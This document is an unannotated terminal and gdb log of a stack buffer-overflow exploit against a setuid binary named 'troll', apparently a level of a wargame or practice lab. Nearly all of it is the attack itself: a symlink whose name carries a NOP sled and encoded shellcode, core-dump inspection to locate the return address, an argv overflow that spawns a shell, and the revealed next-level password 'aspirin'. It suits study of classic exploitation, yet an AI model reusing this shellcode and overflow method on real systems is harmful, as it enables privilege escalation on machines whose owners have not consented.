0xbfffff30:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff40:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff50:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) 
0xbfffff60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffffa0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffffb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffffc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffffd0:	0x00000000	0x00000000	0x2e000000	0x4141412f
0xbfffffe0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffff0:	0x41414141	0x41414141	0x00414141	0x00000000
0xc0000000:	Cannot access memory at address 0xc0000000
(gdb) 
0xc0000004:	Cannot access memory at address 0xc0000004
(gdb)   
0xc0000008:	Cannot access memory at address 0xc0000008
(gdb) 
0xc000000c:	Cannot access memory at address 0xc000000c
(gdb) 
0xc0000010:	Cannot access memory at address 0xc0000010
(gdb) 
0xc0000014:	Cannot access memory at address 0xc0000014
(gdb) 
0xc0000018:	Cannot access memory at address 0xc0000018
(gdb) 
0xc000001c:	Cannot access memory at address 0xc000001c
(gdb) 
0xc0000020:	Cannot access memory at address 0xc0000020
(gdb) 
0xc0000024:	Cannot access memory at address 0xc0000024
(gdb) 
0xc0000028:	Cannot access memory at address 0xc0000028
(gdb) 
0xc000002c:	Cannot access memory at address 0xc000002c
(gdb) 
0xc0000030:	Cannot access memory at address 0xc0000030
(gdb) q
[orge@localhost orge]$ ls -l
total 100
lrwxrwxrwx    1 orge     orge            5 Mar 28 19:41 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> trell
-rw-------    1 orge     orge        61440 Mar 28 19:41 core
-rwsr-sr-x    1 orge     orge        12693 Mar 28 19:33 trell
-rwsr-sr-x    1 troll    troll       12693 Mar  1  2010 troll
-rw-r--r--    1 root     root          772 Mar 29  2010 troll.c
[orge@localhost orge]$ ln -s trell `python -c 'print "AAAA"+"\x90"*40+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAA????????????????????????????????????????龞1ɱ2?l?ÿ??羵ꀨ쀿ÿ2i00tii0cjo?㐔?࿱?̿  core  trell  troll  troll.c
[orge@localhost orge]$ ./AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                                                                AAAAꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁
[orge@localhost orge]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAA????????????????????????????????????????龞1ɱ2?l?ÿ??羵ꀨ쀿ÿ2i00tii0cjo?㐔?࿱?̿  core  trell  troll  troll.c
[orge@localhost orge]$ rm AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
[orge@localhost orge]$ ./`python -c 'print "AAAA"+"\x90"*40+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
argc must be two!
[orge@localhost orge]$ ./`python -c 'print "AAAA"+"\x90"*40+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
argc must be two!
[orge@localhost orge]$ ./`python -c 'print "AAAA"+"\x90"*40+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` d
stack is still your friend.
[orge@localhost orge]$ ./`python -c 'print "AAAA"+"\x90"*40+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[orge@localhost orge]$ ./`python -c 'print "AAAA"+"\x90"*40+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "A"*44+"\xf0\xfb\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA쿿
Segmentation fault (core dumped)
[orge@localhost orge]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./AAAA鐞1ɱ2lÿ瀵쩪ÿÿÿ2i00tii'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfffff9c in ?? ()
(gdb) Xshell
Undefined command: "Xshell".  Try "help".
(gdb) x/100 $esp
0xbffff9f0:	0x00000000	0xbffffa34	0xbffffa40	0x40013868
0xbffffa00:	0x00000002	0x08048450	0x00000000	0x08048471
0xbffffa10:	0x08048500	0x00000002	0xbffffa34	0x08048390
0xbffffa20:	0x0804866c	0x4000ae60	0xbffffa2c	0x40013e90
0xbffffa30:	0x00000002	0xbffffb30	0xbffffb8f	0x00000000
0xbffffa40:	0xbffffbc0	0xbffffbcf	0xbffffbe8	0xbffffc07
0xbffffa50:	0xbffffc29	0xbffffc33	0xbffffdf6	0xbffffe15
0xbffffa60:	0xbffffe2f	0xbffffe44	0xbffffe60	0xbffffe6b
0xbffffa70:	0xbffffe85	0xbffffe92	0xbffffe9a	0xbffffea4
0xbffffa80:	0xbffffeb4	0xbffffec2	0xbffffed0	0xbffffee1
0xbffffa90:	0xbffffeec	0xbffffefc	0xbfffff3c	0x00000000
0xbffffaa0:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffab0:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffac0:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffad0:	0x00000009	0x08048450	0x0000000b	0x000001fb
0xbffffae0:	0x0000000c	0x000001fb	0x0000000d	0x000001fb
0xbffffaf0:	0x0000000e	0x000001fb	0x00000010	0x0fabfbff
0xbffffb00:	0x0000000f	0xbffffb2b	0x00000000	0x00000000
0xbffffb10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb20:	0x00000000	0x00000000	0x69000000	0x00363836
0xbffffb30:	0x41412f2e	0x90904141	0x90909090	0x90909090
0xbffffb40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb50:	0x90909090	0x90909090	0x90909090	0x11eb9090
0xbffffb60:	0xb1c9315e	0x0e6c8032	0xe98001ff	0xebf67501
0xbffffb70:	0xffeae805	0xc132ffff	0x30306951	0x30696974
(gdb) 
0xbffffb80:	0x8a6f6a63	0x8a5451e4	0x0cb19ae2	0x8a0081ce
0xbffffb90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffba0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbe0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbf0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc20:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc30:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc40:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc50:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffca0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffce0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcf0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd00:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) x/100 $esp-100
0xbffff98c:	0x4005d920	0x400143e0	0xbffff9ac	0x40066070
0xbffff99c:	0x40106980	0x4000ae60	0xbffffa34	0xbffff9e8
0xbffff9ac:	0x0804863a	0xbffffb8f	0x00000000	0x00000030
0xbffff9bc:	0x00000017	0x00000000	0x00000000	0x00000000
0xbffff9cc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffff9dc:	0x00000000	0x00000000	0x00000000	0x41414141
0xbffff9ec:	0xbffffbf0	0x00000000	0xbffffa34	0xbffffa40
0xbffff9fc:	0x40013868	0x00000002	0x08048450	0x00000000
0xbffffa0c:	0x08048471	0x08048500	0x00000002	0xbffffa34
0xbffffa1c:	0x08048390	0x0804866c	0x4000ae60	0xbffffa2c
0xbffffa2c:	0x40013e90	0x00000002	0xbffffb30	0xbffffb8f
0xbffffa3c:	0x00000000	0xbffffbc0	0xbffffbcf	0xbffffbe8
0xbffffa4c:	0xbffffc07	0xbffffc29	0xbffffc33	0xbffffdf6
0xbffffa5c:	0xbffffe15	0xbffffe2f	0xbffffe44	0xbffffe60
0xbffffa6c:	0xbffffe6b	0xbffffe85	0xbffffe92	0xbffffe9a
0xbffffa7c:	0xbffffea4	0xbffffeb4	0xbffffec2	0xbffffed0
0xbffffa8c:	0xbffffee1	0xbffffeec	0xbffffefc	0xbfffff3c
0xbffffa9c:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffaac:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffabc:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffacc:	0x00000000	0x00000009	0x08048450	0x0000000b
0xbffffadc:	0x000001fb	0x0000000c	0x000001fb	0x0000000d
0xbffffaec:	0x000001fb	0x0000000e	0x000001fb	0x00000010
0xbffffafc:	0x0fabfbff	0x0000000f	0xbffffb2b	0x00000000
0xbffffb0c:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) 
0xbffffb1c:	0x00000000	0x00000000	0x00000000	0x69000000
0xbffffb2c:	0x00363836	0x41412f2e	0x90904141	0x90909090
0xbffffb3c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb4c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb5c:	0x11eb9090	0xb1c9315e	0x0e6c8032	0xe98001ff
0xbffffb6c:	0xebf67501	0xffeae805	0xc132ffff	0x30306951
0xbffffb7c:	0x30696974	0x8a6f6a63	0x8a5451e4	0x0cb19ae2
0xbffffb8c:	0x8a0081ce	0x00000000	0x00000000	0x00000000
0xbffffb9c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbac:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbbc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbcc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbdc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbec:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbfc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc0c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc1c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc2c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc3c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc4c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc5c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc6c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc7c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc8c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc9c:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) q
[orge@localhost orge]$ ./`python -c 'print "AAAA"+"\x90"*40+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "A"*44+"\x5c\xfb\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
bash$ exit
exit
[orge@localhost orge]$ ./`python -c 'print "AAAA"+"\x90"*40+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "A"*44+"\x5c\xfb\xff\xbf"'`fa
argument is too long!
[orge@localhost orge]$ ls -s
total 100
   0 AAAA????????????????????????????????????????龞1ɱ2?l?ÿ??羵ꀨ쀿ÿ2i00tii0cjo?㐔?࿱?̿    64 core    16 trell    16 troll     4 troll.c
[orge@localhost orge]$ rm AAAAꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁ 
[orge@localhost orge]$ ln -s troll `python -c 'print "AAAA"+"\x90"*40+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ./`python -c 'print "AAAA"+"\x90"*40+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "A"*44+"\x5c\xfb\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ my-pass
euid = 508
aspirin
bash$ exit
exit
[orge@localhost orge]$ 